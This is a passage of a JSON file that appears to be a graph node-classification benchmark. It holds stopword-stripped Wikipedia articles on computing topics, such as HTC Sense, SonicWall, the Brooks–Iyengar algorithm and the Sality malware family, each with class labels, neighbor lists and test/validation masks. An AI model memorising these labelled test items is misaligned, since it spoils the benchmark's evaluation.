certificate issued another member state eidas regulation article 27 electronic signatures public services member states prohibited requesting signatures higher level qualified electronic signature article 25 2 eidas allows qualified electronic signature carry legal weight handwritten signature",
    "neighbors": [
      3264,
      5674,
      4015,
      5200,
      9744,
      1496,
      3231
    ],
    "mask": "Test"
  },
  {
    "node_id": 8019,
    "label": 2,
    "text": "HTC_Sense:htc sense htc sense software suite developed htc used primarily company android-based devices serving successor htc touchflo 3d software windows mobile sense modifies many aspects android user experience incorporating additional features altered home screen keyboard additional widgets re-designed applications additional htc-developed applications first device sense htc hero released 2009 hd2 running windows mobile 6.5 released later year included sense following release hero future android devices htc shipped sense except nexus one t-mobile g2 htc first google pixel pixel 2 nexus 9 used stock version android also htc smartphones using mediatek processors come without htc sense mobile world congress 2010 htc debuted new updated htc sense ui htc desire htc legend upgrade available hero magic new version based upon android 2.1 featured interface features friend stream widget aggregated twitter facebook flickr information leap allows access home screens htc sensation released featured htc sense 3.0 added interface elements including updated lock screen allows applications pinned directly easier access htc evo 3d also features sense 3.0 two versions sense developed android 4.0 sense 4.0 included htc new devices beginning 2012 htc one x designed provide refreshed minimalist look closer stock android previous versions integrating features provided android 4.0 sense 3.6 distributed updates older htc phones designed maintain closer resemblance previous versions sense android 2.3 original version sense first introduced htc hero espresso codename version sense running atop t-mobile mytouch devices debuted t-mobile mytouch 3g htc espresso t-mobile mytouch 4g htc glacier features widgets apps regular sense color apps certain interface elements blue instead green pushed apps appear home screen sense 4.1 debuted htc desire htc legend provided upgrades htc hero htc magic introduced friendstream leap feature similar macos mission control sense 3.0 debuted htc sensation version introduced htc watch movie streaming service updated lockscreen app shortcuts easier access additional lockscreen styles included widgets display content weather photos also features 3d homescreen transition effects swiping among homescreens legacy htc devices received updates android 4.0 use sense 3.6 update integrating select features sense 4 updated home screen visual design elements sense 3.5 sense 4.0 first introduced htc one series devices android 4.0 unveiled 2012 one x one one v. many aspects sense interface modified closer resemble standard android interface home screen uses dock shortcuts instead fixed apps phone personalize buttons previous versions new application switcher using cards updated stock apps beats audio support sense 4.1 minor update original sense 4.0 ran top android 4.0.4 opposed android 4.0.3 included many bug fixes optimizations device original htc one series receive update htc one v. announced 2012 htc one x+ updates sense 4+ also released android 4.1.2 updates one x one evo 4g lte one sv lte 3g desire x.. announced april 2013 2013 htc one features minimalistic design new scrolling news aggregator home screen known blinkfeed displays scrolling grid news headlines social network content default sense 5 uses three home screen pages two traditional grid apps widgets previous devices using grid fewer spaces apps default default screen redesigned clock blinkfeed although pages still added sense 5.0 going exclusive htc one february 28 2013 htc announced would provide updates butterfly one later discontinued one x/x+ sense 5.0 coming months announced september 2013 htc one max adds rss google+ support blinkfeed allows users disable blinkfeed entirely adds tool making animated gifs additional highlights themes sense 6.0 nicknamed sixth sense announced alongside 2014 htc one m8 march 25 2014 based android 4.4 kitkat similar sense 5 offers new customization options color themes new font choices increased use transparency effects particularly home screen sense 6.0 devices use on-screen buttons updates included apps blinkfeed gallery tv zoe updated independently sense google play store htc one 2013 one mini one max updated 6.0 via software update sense 7.0 announced mobile world congress march 1 2015 alongside htc one m9 based android 5.0 lollipop largely sense 6.0 far default user interface concerned save tweaked icons new weather clock widget perhaps notable new feature new user interface theming app simply called themes allows users alter color schemes icons sounds fonts throughout operating system users either create themes scratch download pre-made ones created htc fellow users another major new feature ability customize navigation buttons across bottom display users change order add fourth button power button one hides navigation bar altogether htc confirmed advertisements displayed blinkfeed however htc given option user opt-out receiving advertisements august 2015 owners htc m8 m9 united states reported reddit received push-notification promoting upcoming fantastic four movie theme htc u12+ ships android 8.0 oreo overlay htc sense ui 10.0 features project treble allows faster updates new versions android appear amazon alexa google assistant htc sense companion virtual assistants come pre-installed c 1 sense 3.6 exclusively obtained android 4.0 updates existing devices htc devices released since introduction sense incorporate several including nexus one released first device nexus series t-mobile g2 variation htc desire z stock android htc first facebook home disabled special edition htc one released google play june 2013 march 2014 htc announced desire 310 running android 4.2.2 addition blinkfeed video highlights like predecessor htc one m8 also got google play edition running android 4.4.2 nexus 9 tablet unveiled google october 15 2014 running android 5.0",
    "neighbors": [
      10755,
      5637,
      8719,
      3600,
      7700,
      9244,
      11294,
      1578,
      5677,
      1083,
      6212,
      69,
      2630,
      8262,
      4685,
      3664,
      8280,
      8285,
      2658,
      11391,
      1670,
      5262,
      10393,
      7835,
      673,
      8870,
      1191,
      7857,
      196,
      8907,
      2259,
      8413,
      9949,
      1255,
      8940,
      5892,
      7428,
      2828,
      280,
      10009,
      10525,
      798,
      288,
      2852,
      8486,
      10537,
      7983,
      3380,
      5431,
      2875,
      3900,
      10045,
      11082,
      332,
      3409,
      2901,
      5467,
      3940,
      7548,
      4995,
      9610,
      10129,
      5522,
      1427,
      10645,
      2978,
      1959,
      937,
      5546,
      6057,
      7595,
      2001,
      479,
      1516,
      5100,
      5613,
      5620,
      11252,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 8020,
    "label": 2,
    "text": "Plurix:plurix plurix unix-like operating system developed brazil early 1980s plurix developed federal university rio de janeiro ufrj nce nce researchers returning postgraduate courses usa attempted license unix source code late 1970s without success 1982 due refusing license code development team led newton faller decided initiate development alternative system called plurix ** using reference unix version 7 recent time running old motorola computer system 1985 plurix system running pegasus 32-x shared-memory multi-processor computer also designed nce plurix licensed brazilian companies 1988 two brazilian universities also developed unix systems universidade federal de minas gerais ufmg developed dcc-ix operating system university são paulo usp developed real operating system 1987 nce/ufrj also offered technical courses os design implementation local computer companies later produced proprietary unix systems fact brazilian companies first created organization companies interested unix called api tried license unix attempts frustrated end 1986 canceled negotiations api companies edisa cobra softec invested development systems edix sox analix respectively finally licensed code brazilian companies majority decided drop local development use licensed code localize system purposes cobra nce/ufrj kept developing tried convince brazilian government prohibit entrance unix brazil since operating systems developed cobra plurix similar could things brazilian industry 80s protected market foreign company could n't sell product brazil brazilian company offered similar hardware software cobra strong argument similarity os recognized x/open government north american pressure delayed decision new president elected twenty years military dictatorship first act terminate laws ruled brazilian market protection hardware software later everything else projects withdrawn nce went back university cobra almost went bankrupt state-owned company whose major customer banco brasil certainly none national systems comprehensiveness original unix system v incorporated software different origins fifteen years ahead however evolution national systems could followed viable proper way still preserved basic characteristics unix philosophy assure compatibility unix systems around world nce plurix project evolved 2 projects mulplix unix-like operating system designed support medium-grain parallelism provide efficient environment running parallel applications within multiplus multiplus distributed shared-memory multiprocessor designed modular architecture able support 1024 processing elements 32 gb global memory address space developed group volunteers like gnu/linux tropix fully preemptive real-time unix-like operating system pcs user level tropix bears reasonable similarity unix operating system processes created fork-execs i/o always treated sequence bytes performed open-read-write-close primitives signals sent processes kernel process zero swapper/pager init process common ancestor user processes etc internally tropix kernel structure quite different unix tropix fully preemptible kernel many specialized system calls manipulate coordinate execution real-time processes real-time processes coexist time-sharing counterparts run higher priorities many privileges besides swapper/pager tropix kernel standard processes include unique dispatcher process per processor running multiprocessing environment scheme greatly facilitates implementation different scheduling strategies followed different processors fine-grain parallel processing within executing processes also possible since tropix implements threads supervisor level",
    "neighbors": [
      2179,
      6787,
      6412,
      5397,
      1304,
      3487,
      9507,
      3241,
      7983,
      3248,
      2995,
      9141,
      823,
      9784,
      9151,
      10436,
      6369,
      5492,
      2424,
      633
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8021,
    "label": 2,
    "text": "Maciej_Stachowiak:maciej stachowiak maciej stachowiak born june 6 1976 polish american software developer currently employed apple inc. leader development team responsible safari web browser webkit framework longtime proponent open source software stachowiak involved scwm gnome nautilus projects linux joining apple actively involved development web standards co-chair world wide web consortium html 5 working group member web hypertext application technology working group steering committee graduating east high school rochester new york 1994 stachowiak accepted mit completed course 6 electrical engineering computer science received sc.b m.eng 1998 mit stachowiak worked rethinking cs101 project 1997 began scheme constraints window manager project greg badros also contributed paper cognitive neural sciences office naval research stachowiak mit m.eng thesis automated extraction structured data html documents indicative early interest web standards development 1999-2001 stachowiak contributed various linux software projects employed eazel one lead developers along andy hertzfeld darin adler create nautilus file manager also developer object activation framework oaf gnome desktop environment 1999-2001 1999 became maintainer scheme interpreter guile employment eazel stachowiak also contributed eye gnome gnome libs gravevine gnop developer medusa bonobo gnome vfs stachowiak also member gnome foundation board directors told fortune magazine eazel seemed like borderline-crazy business plan ... said 'sure 'll work colleagues fidgeted uncomfortably two months later eazel ceased operations laying entire staff closure eazel remaining senior engineers including bud tribble melton darin adler john sullivan ken kocienda stachowiak joined apple safari team june 2001 later joined netscape/mozilla firefox alumni david hyatt june 13 2002 stachowiak announced mailing list apple releasing javascriptcore framework mac os x based kde javascript engine webkit project javascriptcore since evolved squirrelfish extreme javascript engine compiles javascript native machine code june 6 2005 webkit made open source coincidentally stachowiak birthday stachowiak wrote behalf apple along members mozilla foundation opera software proposal new html working group w3c adopt web hypertext application technology working group ’ html5 starting point work 9 may 2007 new html working group resolved may 2009 stachowiak co-authored w3c html design principles html5 one first major documentation projects w3c 27 august 2009 stachowiak co-chaired world wide web consortium html working group along ibm sam ruby microsoft paul cotton webkit underpinnings safari published open-source software june 6 2005 safari run latest version webkit passed web standards project acid2 test stachowiak reported webkit blog march 26 2008 software passed 100/100 acid3 test making safari first browser pass",
    "neighbors": [
      10083,
      10012,
      487,
      9275,
      2139,
      9778,
      823,
      3323,
      124
    ],
    "mask": "Test"
  },
  {
    "node_id": 8022,
    "label": 4,
    "text": "SonicWall:sonicwall sonicwall originally private company headquartered silicon valley dell subsidiary 2012 2016 sells range internet appliances primarily directed content control network security include devices providing services network firewalls utms unified threat management vpns virtual private network anti-spam email company also markets information subscription services related products company solutions also serve solve problems surrounding hipaa pci compliance march 13 2012 usa today said dell announced intent acquire sonicwall 130 patents 950 employees dell acquisition sonicwall became official may 9 2012 june 20 2016 dell sold sonicwall part dell software private equity firm francisco partners elliott management 1991 brothers sreekanth ravi sudhakar ravi founded company name sonic systems develop ethernet fast ethernet cards hubs bridges apple market late 1990s company released security product initially called interpol later branded sonicwall dedicated hardware appliance firewall vpn software intended small-business market sales security appliances rapidly accelerated company exited apple add-on networking business refocused exclusively network security company late 1999 company changed name sonic systems sonicwall inc. represent shift network security company november 1999 sonicwall went public symbol snwl 2001 sonicwall upgraded global management system gms software manage vpn devices matthew t. medeiros formerly philips components became ceo march 2003 sonicwall acquired number companies years expanding product line process 2005 sonicwall announced acquisition enkoo 2007 sonicwall announced acquisition aventail corporation july 23 2010 sonicwall announced completed merger affiliates investor group led thoma bravo llc included ontario teachers pension plan private investor department teachers private capital merger sonicwall delisted nasdaq march 13 2012 dell announced signed definitive agreement acquire sonicwall may 20 2016 dell announced sale dell software included sonicwall private equity firm francisco partners elliott management",
    "neighbors": [
      8515,
      7972,
      3941,
      10615,
      9640,
      11146,
      939,
      7089,
      3732,
      5749,
      54,
      7126,
      1400,
      7515,
      8471,
      10392,
      8735
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8023,
    "label": 4,
    "text": "Tsutomu_Shimomura:tsutomu shimomura shimomura founder semiconductor company neofocal systems served ceo cto 2016 born japan shimomura son osamu shimomura winner 2008 nobel prize chemistry grew princeton new jersey attended princeton high school caltech studied nobel laureate richard feynman caltech went work los alamos national laboratory continued hands-on education position staff physicist brosl hasslacher others subjects lattice gas automata 1989 became research scientist computational physics university california san diego senior fellow san diego supercomputer center shimomura also became noted computer security expert working national security agency 1992 testified congress issues regarding privacy security lack thereof cellular telephones author bruce sterling described first meeting shimomura documentary freedom downtime best known events 1995 assisted tracking computer hacker kevin mitnick year shimomura also received prank calls popularized phrase kung fu stronger equating hacking shimomura journalist john markoff wrote book pursuit book later adapted movie similar name track shimomura appeared brief cameo movie shimomura worked sun microsystems late 1990s shimomura founder privately held fabless semiconductor company neofocal systems served ceo cto 2016 kevin mitnick others raised legal ethical questions concerning shimomura involvement case california author jonathan littman wrote 1996 book case called fugitive game online kevin mitnick presented mitnick side story different version events written shimomura markoff book littman made allegations journalistic impropriety markoff questioned legality shimomura involvement matter well suggesting many parts fabricated authors self-serving purposes mitnick autobiography ghost wires expands concerns shimomura involvement case unethical illegal",
    "neighbors": [
      9665,
      1315,
      7887,
      10110,
      4956,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 8024,
    "label": 4,
    "text": "NANO_Antivirus:nano antivirus nano antivirus russian antivirus software developed nano security ltd software free paid nano antivirus pro versions nano security russian company founded 2009 team developed implemented antivirus software since 2003 nano security ltd integrated security maintenance microsoft software intended use homes small businesses 2017 nano antivirus pro included russian software registry ministry telecom mass communications russian federation nano antivirus failed pass vb100 certification first attempt since earned five consecutive vb100 awards award streak interrupted failed certification nano antivirus earned two vb100 including last certification vb100 team commended product quality nano antivirus integrated following online scanners virustotal opswat metadefender virscan.org engine supplier certified partner technologies nano security patented europe usa russia china countries",
    "neighbors": [
      2049,
      7809,
      131,
      1417,
      6797,
      3342,
      4374,
      1052,
      156,
      2721,
      2213,
      550,
      1318,
      6823,
      2601,
      8614,
      2859,
      3243,
      6699,
      8615,
      7983,
      6834,
      4403,
      10166,
      2749,
      704,
      9537,
      7362,
      10308,
      4421,
      202,
      1355,
      1994,
      5069,
      10574,
      10708,
      2005,
      11225,
      1242,
      2907,
      8668,
      2654,
      9055,
      9569,
      11622,
      106,
      4464,
      9713,
      3955,
      6643,
      9341,
      127
    ],
    "mask": "Test"
  },
  {
    "node_id": 8025,
    "label": 4,
    "text": "Brooks–Iyengar_algorithm:brooks–iyengar algorithm brooks–iyengar algorithm brooks–iyengar hybrid algorithm distributed algorithm improves precision accuracy interval measurements taken distributed sensor network even presence faulty sensors sensor network exchanging measured value accuracy value every node every node computes accuracy range measured value whole network values collected even data sensors faulty sensor network malfunction algorithm fault-tolerant distributed could also used sensor fusion method precision accuracy bound algorithm proved 2016 brooks–iyengar hybrid algorithm distributed control presence noisy data combines byzantine agreement sensor fusion bridges gap sensor fusion byzantine fault tolerance seminal algorithm unified disparate fields first time essentially combines dolev ’ algorithm approximate agreement mahaney schneider ’ fast convergence algorithm fca algorithm assumes n processing elements pes faulty behave maliciously takes input either real values inherent inaccuracy noise unknown real value apriori defined uncertainty interval output algorithm real value explicitly specified accuracy algorithm runs n log n n number pes see big notation possible modify algorithm correspond crusader ’ convergence algorithm cca however bandwidth requirement also increase algorithm applications distributed control software reliability high-performance computing etc brooks–iyengar algorithm executed every processing element pe distributed sensor network pe exchanges measured interval pes network fused measurement weighted average midpoints regions found concrete steps brooks–iyengar algorithm shown section pe performs algorithm separately input measurement sent pe k pe closed interval formula_1 formula_2 output output pe includes point estimate interval estimate example consider example 5 pes pe 5 formula_14 sending wrong values pes exchange values values received formula_15 next table draw weighted region diagram wrd intervals determine formula_16 pe 1 according algorithm formula_17 consists intervals least 4 formula_3 5−1 measurements intersect output pe 1 equal formula_19 interval estimate formula_20 similar could obtain inputs results 5 pes 1982 byzantine problem byzantine general problem extension two generals problem could viewed binary problem 1983 approximate consensus method removes values set consists scalars tolerant faulty inputs 1985 in-exact consensus method also uses scalar input 1996 brooks-iyengar algorithm method based intervals 2013 byzantine vector consensus method uses vectors input 2013 multidimensional agreement method also use vectors input measure distance different could use approximate consensus scalar-based brooks-iyengar algorithm interval-based byzantine vector consensus vector-based deal interval inputs paper proved brooks–iyengar algorithm best brooks–iyengar algorithm seminal work major milestone distributed sensing could used fault tolerant solution many redundancy scenarios also easy implement embed networking systems 1996 algorithm used minix provide accuracy precision leads development first version rt-linux 2000 algorithm also central darpa sensit program ’ distributed tracking program acoustic seismic motion detection readings multiple sensors combined fed distributed tracking system besides used combine heterogeneous sensor feeds application fielded bbn technologies bae systems penn state applied research lab arl usc/isi besides thales group uk defense manufacturer used work global operational analysis laboratory applied raytheon ’ programs many systems need extract reliable data unreliable sensor network exempts increasing investment improving sensor reliability also research developing algorithm results tools used us nav maritime domain awareness software education brooks–iyengar algorithm widely used teaching classes university wisconsin purdue georgia tech clemson university university maryland etc addition area sensor network fields time-triggered architecture safety cyber-physical systems data fusion robot convergence high-performance computing software/hardware reliability ensemble learning artificial intelligence systems could also benefit brooks–iyengar algorithm inventors brooks iyengar algorithm dr brooks dr ss iyengar received prestigious 25 year test time award pioneering research high impact brooks-iyengar algorithm high impact research work influenced numerous us government programs commercial products",
    "neighbors": [
      7499,
      9677,
      7085,
      7315,
      11612
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8026,
    "label": 0,
    "text": "Michel_DeGraff:michel degraff michel frederic degraff haitian creolist served board journal haitian studies tenured professor massachusetts institute technology founding member haitian creole academy field scholarship creole language also known lang kreyòl linguistics known advocacy towards recognition haitian creole full-fledged language fall 2012 received 1 million grant national science foundation introduce online creole language materials teaching stem haiti believes haitian children taught native language levels instruction contrary tradition teaching french degraff believes instruction french foreign language haitian children hinders creativity ability excel child growing middle-class haitian family attending top school instruction french degraff reports despite top student often felt french hindrance speaking well caused complexes inferiority among otherwise bright children remembers believing spoke one half language haitian creole half fact language children spoke well default creole recalls french although imposed home school never used jokes soccer field dr. degraff holds phd computer science university pennsylvania prior phd studied computer science city college new york arrived city college haiti 1982 developed interest linguistics internship bell labs new jersey 1985 dr. degraff currently works introducing ict haitian children instructed creole matènwa school la gonâve children encouraged use google translate read available web languages creole national science foundation grant also using computer games creole teach math skills",
    "neighbors": [
      5699
    ],
    "mask": "None"
  },
  {
    "node_id": 8027,
    "label": 3,
    "text": "Knightmare_III:_Shalom:knightmare iii shalom",
    "neighbors": [
      8193,
      4357,
      9006
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8028,
    "label": 1,
    "text": "SQL_CLR:sql clr sql clr sqlclr sql common language runtime technology hosting microsoft .net common language runtime engine within sql server sqlclr allows managed code hosted run microsoft sql server environment technology introduced microsoft sql server 2005 allow users example create following types managed code objects sql server .net languages c vb.net sql clr relies creation deployment registration cli assemblies physically stored managed code dynamic load libraries dlls assemblies may contain cli namespaces classes functions properties",
    "neighbors": [
      3045,
      10413,
      11030,
      1719,
      5403,
      2780
    ],
    "mask": "None"
  },
  {
    "node_id": 8029,
    "label": 4,
    "text": "HashClash:hashclash hashclash distributed computing project find collisions md5 hash algorithm based department mathematics computer science eindhoven university technology marc stevens initiated project part master degree thesis project ended stevens defended m.sc thesis june 2007 however sha1 added later code repository ported git 2017 project used create rogue certificate authority certificate 2009",
    "neighbors": [
      517,
      3282,
      915,
      6421,
      9271
    ],
    "mask": "None"
  },
  {
    "node_id": 8030,
    "label": 7,
    "text": "GridWay:gridway gridway open-source meta-scheduling technology enables large-scale secure reliable efficient sharing computing resources clusters computing farms servers supercomputers ... managed different distributed resource management systems drms sge htcondor pbs lsf within single organization enterprise grid scattered across several administrative domains partner supply-chain grid end gridway supports several grid middlewares gridway provides end users application developers scheduling framework similar found local drms allowing submit monitor synchronize control jobs means drms-like command line interface gwsubmit gwwait gwkill ... drmaa ogf standard gridway performs job execution management resource brokering allowing unattended reliable efficient execution jobs array jobs complex jobs heterogeneous dynamic loosely coupled grids gridway performs job scheduling submission steps transparently end user adapts job execution changing grid conditions providing fault recovery mechanisms dynamic scheduling migration on-request opportunistic migration gridway framework light component meta-scheduling grid ecosystem intended end users grid application developers",
    "neighbors": [
      10625,
      5956,
      7983,
      9040,
      2710,
      2040,
      11353,
      2651,
      8702,
      7935
    ],
    "mask": "Test"
  },
  {
    "node_id": 8031,
    "label": 2,
    "text": "Stuart_Feldman:stuart feldman stuart feldman creator computer software program make unix systems also author first fortran 77 compiler part original group bell labs created unix operating system feldman head schmidt sciences foundation schmidt philanthropies member dean external advisory board university michigan school information previously vice president engineering east coast google vice president computer science ibm research feldman served board computing research association cra association advance collegiate schools business aacsb international chair acm sigplan founding chair acm sigecom elected president acm 2006 feldman also member editorial advisory board acm queue magazine helped found steve bourne also served editorial boards ieee internet computing ieee transactions software engineering received a.b astrophysical sciences princeton university ph.d applied mathematics massachusetts institute technology feldman became fellow ieee 1991 fellow acm 1995 2003 awarded acm software system award creation make",
    "neighbors": [
      1952,
      7872,
      4398,
      7983,
      9298,
      5492,
      1783,
      3323
    ],
    "mask": "None"
  },
  {
    "node_id": 8032,
    "label": 4,
    "text": "Sality:sality sality classification family malicious software malware infects files microsoft windows systems sality first discovered 2003 advanced years become dynamic enduring full-featured form malicious code systems infected sality may communicate peer-to-peer p2p network form botnet purpose relaying spam proxying communications exfiltrating sensitive data compromising web servers and/or coordinating distributed computing tasks purpose processing intensive tasks e.g password cracking since 2010 certain variants sality also incorporated use rootkit functions part ongoing evolution malware family continued development capabilities sality considered one complex formidable forms malware date majority antivirus a/v vendors use following naming conventions referring family malware sality family polymorphic file infectors target windows executable files extensions .exe .scr sality utilizes polymorphic entry-point obscuring epo techniques infect files using following methods changing entry point address host replacing original host code entry point executable variable stub redirect execution polymorphic viral code inserted last section host file stub decrypts executes secondary region known loader finally loader runs separate thread within infected process eventually load sality payload sality may execute malicious payload deletes files certain extensions and/or beginning specific strings terminates security-related processes services searches user ’ address book e-mail addresses send spam messages contacts remote host sality may also download additional executable files install malware purpose propagating pay per install applications sality may contain trojan components variants may ability steal sensitive personal financial data i.e information stealers generate relay spam relay traffic via http proxies infect web sites achieve distributed computing tasks password cracking well capabilities sality ’ downloader mechanism downloads executes additional malware listed urls received using peer-to-peer component distributed malware may share “ code signature ” sality payload may provide attribution one group and/or share large portion code additional malware typically communicates reports central command control c c servers located throughout world according symantec combination file infection mechanism fully decentralized peer-to-peer network ... make sality one effective resilient malware today threat landscape two versions botnet currently active versions 3 4 malware circulated botnets digitally signed attackers prevent hostile takeover recent years sality also included use rootkit techniques maintain persistence compromised systems evade host-based detections anti-virus software sality infects files affected computer variants use dll dropped computer dll file written disk two forms example dll file contains bulk virus code file extension .dl_ compressed copy recent variants sality virus win32-sality.am drop dll instead load entirely memory without writing disk variant along others also drops driver random file name folder system \\drivers malware may also drop sality computer example sality variant detected virus win32-sality.au dropped worm win32-sality.au variants sality may also include rootkit creating device name device\\amsint32 \\dosdevices\\amsint32 sality usually targets files drive c .scr .exe file extensions beginning root folder infected files increase size varying amount virus also targets applications run windows start frequently used applications referenced following registry keys sality avoids infecting particular files order remain hidden computer variants sality infect legitimate files moved available removable drives network shares enumerating network share folders resources local computer files drive c beginning root folder infects files finds adding new code section host inserting malicious code newly added section legitimate file exists malware copy file temporary files folder infect file resulting infected file moved root available removable drives network shares following sality variant also creates autorun.inf file root drives points virus copy drive accessed computer supporting autorun feature virus launched automatically sality variants may also drop file .tmp file extension discovered network shares resources well drop .lnk file run dropped virus microsoft identified dozens files commonly associated malware",
    "neighbors": [
      2432,
      3072,
      6916,
      10756,
      3724,
      6797,
      3347,
      4883,
      2325,
      278,
      11413,
      9630,
      10657,
      2213,
      4648,
      939,
      7851,
      46,
      7855,
      8753,
      52,
      10297,
      3643,
      7739,
      7996,
      10875,
      9791,
      8640,
      9664,
      9154,
      11583,
      8133,
      4423,
      10952,
      81,
      8789,
      10457,
      7515,
      988,
      3807,
      225,
      3941,
      10477,
      4462,
      9972,
      4725,
      2041,
      2811,
      3581,
      5886,
      9087
    ],
    "mask": "None"
  },
  {
    "node_id": 8033,
    "label": 2,
    "text": "Dyne:bolic:dyne bolic dyne bolic gnu/linux live cd/dvd distribution based linux kernel shaped needs media activists artists creators practical tool focus multimedia production delivers large assortment applications allows manipulation broadcast sound video tools record edit encode stream addition multimedia specific programs dyne bolic also provides word processors common desktop computing tools termed rastasoft author based entirely free software recognized gnu project dyne bolic created volunteers author maintainer jaromil also included multimedia tools like muse hasciicam freej distribution dyne bolic intended used live cd/dvd require installation hard drive attempts recognize devices peripherals sound video tv etc automatically designed work older slower computers kernel optimized low latency performance making distribution suitable audio video production turning pcs full media stations reason software included sometimes newest version available dyne bolic extended downloading extra modules development tools common software like openoffice.org squashfs files placed modules/ directory dock see burnt cd automatically integrated boot basic system requirements version 1.x 2.x relatively low pc pentium amd k5 i586 class cpu 64 mb ram ide cd-rom drive sufficient versions dyne bolic 1.x ported co-developer smilzo used xbox game console multiple xbox installations could clustered console installation clustering currently supported version 2.x version 3.0 codenamed munir higher system requirements former releases first comes dvd image pentium ii amd k6-2 class processor 256 mb ram ide/sata dvd-rom drive recommended harddisk needed released september 8 2011 user copies dyne/ directory cd/dvd suitably formatted partition drive called docking file system recognised booted cd dvd option install gnu grub bootloader edit existing one booting floppy disk supported user settings saved disc usb flash drive writable image file containing /home /etc filesystem described nesting also encrypted better privacy version 3.0 currently dyne bolic 3.0 beta 4 uses linux kernel 3.0.1 dvd-rom image 1.65 gb gnome 2 used desktop interface grub2 boot loader version latest 2.5.2 uses linux kernel 2.6 cd-rom image xfce used desktop interface version used linux kernel 2.4 cd-rom image brought ability create nests docks hard disk usb key features present dyne bolic 1.x dropped later",
    "neighbors": [
      8837,
      7435,
      4493,
      10127,
      2321,
      10257,
      8851,
      5397,
      8214,
      4887,
      10394,
      8992,
      673,
      3618,
      3745,
      10016,
      9253,
      10149,
      10530,
      11305,
      9899,
      7854,
      2864,
      2738,
      4790,
      439,
      56,
      59,
      7483,
      3903,
      4673,
      2375,
      4039,
      8907,
      1110,
      473,
      9693,
      2914,
      485,
      3685,
      9064,
      4841,
      6890,
      7913,
      7020,
      10860,
      7534,
      2671,
      7920,
      8177,
      9074,
      5363,
      3317,
      9461,
      6393,
      11388,
      8957,
      1150
    ],
    "mask": "Test"
  },
  {
    "node_id": 8034,
    "label": 3,
    "text": "Yie_Ar_Kung-Fu:yie ar kung-fu yie ar kung-fu features protagonist bruce lee-based kung fu master named oolong japanese ウーロン ūron see oolong renamed lee msx famicom ports controlled player oolong must fight martial arts masters given game eleven arcade version five thirteen home ports win title grand master honor memory father side variety punch kick blows reachable combining joystick one buttons punch kick also greatest jumping ability game fighters exception blues player faces variety opponents unique appearance fighting style player perform 16 different moves using combination buttons joystick movements standing crouching jumping moves thrown high middle low levels regardless move defeated male characters save feedle always fall unconscious lying backs legs apart players flail feet female characters always fall lying sides feedle disappears player gains extra life word xiè xiè mandarin thank heard 11 martial arts masters listed fight order hot fighting history masterhand history msx nes port many differences arcade counterpart hero called lee faces 5 opponents two hidden characters game boy advance access player must input famous konami code title screen characters available special two-player mode found collection fighters bishoo woman dressed white attacks daggers clayman living statue attacks sword bigger sword hidden character mobile phone version katana samurai attacks katana shawn appears msx nes version yie ar kung-fu subsequently widely ported platforms including msx family computer commodore 64 zx spectrum amstrad cpc bbc micro emulated version game released 2005 playstation 2 japan part oretachi geasen zoku sono -series released xbox live arcade xbox 360 july 18 2007 updated graphics nintendo ds recent years game re-released tv game products 1987 game included compilation konami coin-op hits hyper sports green beret mikie nes version relaunched game boy color part konami gb collection vol 4 sega saturn playstation arcade version yie ar kung-fu made available microsoft game room service xbox 360 console windows-based pcs july 2010 msx version yie ar kung-fu released d4 enterprise project egg service october 28 2014 japan game commercial success europe went number 2 uk sales charts behind capcom commando yie ar kung fu went become second best-selling computer game 1986 united kingdom number-two overall 1986 chart sequel yie ar kung-fu ii released year later sequel released home computers never ported arcades another fighting game konami martial champion originally planned released yie ar kung-fu 2 fact jin protagonist martial champion modeled lee protagonist nes msx versions ryu 1987 street fighter arcade game",
    "neighbors": [
      11238,
      5610,
      10316,
      6797,
      9006,
      498,
      10931,
      8601
    ],
    "mask": "None"
  },
  {
    "node_id": 8035,
    "label": 3,
    "text": "Northbridge_(computing):northbridge computing northbridge host bridge one two chips core logic chipset architecture pc motherboard southbridge unlike southbridge northbridge connected directly cpu via front-side bus fsb thus responsible tasks require highest performance northbridge also known memory controller hub usually paired southbridge systems included two chips manage communications cpu parts motherboard constitute core logic chipset pc motherboard older intel based pcs northbridge also named external memory controller hub mch graphics memory controller hub gmch equipped integrated graphics increasingly functions became integrated cpu chip beginning memory graphics controllers intel sandy bridge amd accelerated processing unit processors introduced 2011 functions northbridge reside cpu amd fx cpus still require external northbridge southbridge chips separating different functions cpu northbridge southbridge chips due difficulty integrating components onto single chip instances northbridge southbridge functions combined onto one die design complexity fabrication processes permitted example nvidia geforce 320m 2010 macbook air northbridge/southbridge/gpu combo chip cpu speeds increased time bottleneck eventually emerged processor motherboard due limitations caused data transmission cpu support chipset accordingly starting amd athlon64 series cpus based opteron new architecture used functions north- southbridge chips moved cpu modern intel core processors northbridge integrated cpu die known uncore system agent northbridge typically handles communications among cpu cases ram pci express agp video cards southbridge northbridges also contain integrated video controllers also known graphics memory controller hub gmch intel systems different processors ram require different signaling given northbridge typically work one two classes cpus generally one type ram chipsets support two types ram generally available shift new standard example northbridge nvidia nforce2 chipset work socket processors combined ddr sdram intel i875 chipset work systems using pentium 4 processors celeron processors clock speed greater 1.3 ghz utilize ddr sdram intel i915g chipset works intel pentium 4 celeron use ddr ddr2 memory name derived drawing architecture fashion map cpu would top map comparable due north general purpose geographical maps cpu would connected chipset via fast bridge northbridge located north system devices drawn northbridge would connected rest chipset via slow bridge southbridge located south system devices drawn northbridge plays important part far computer overclocked frequency commonly used baseline cpu establish operating frequency chip typically gets hotter processor speed becomes faster requiring cooling limit cpu overclocking digital circuits limited physical factors rise fall delay storage times transistors current gain bandwidth product parasitic capacitance propagation delay increases among factors operating temperature consequently overclocking applications software-imposed limits multiplier external clock setting additionally heat major limiting factor higher voltages needed properly activate field effect transistors inside cpus higher voltage produces larger amounts heat requiring greater thermal solutions die overall trend processor design integrate functions onto fewer components decreases overall motherboard cost improves performance memory controller handles communication cpu ram moved onto processor die amd beginning amd64 processors intel nehalem processors one advantages memory controller integrated cpu die reduce latency cpu memory another example kind change nvidia nforce3 amd64 systems combines features normal southbridge accelerated graphics port agp port connects directly cpu nforce4 boards marketed media communications processor mcp amd accelerated processing unit processors feature full integration northbridge functions onto cpu chip along processor cores memory controller graphics processing unit gpu evolution amd64 since memory controller integrated cpu die amd64 northbridge replaced system agent introduced sandy bridge microarchitecture 2011 essentially handles previous northbridge functions intel ’ sandy bridge processors feature full integration northbridge functions onto cpu chip along processor cores memory controller 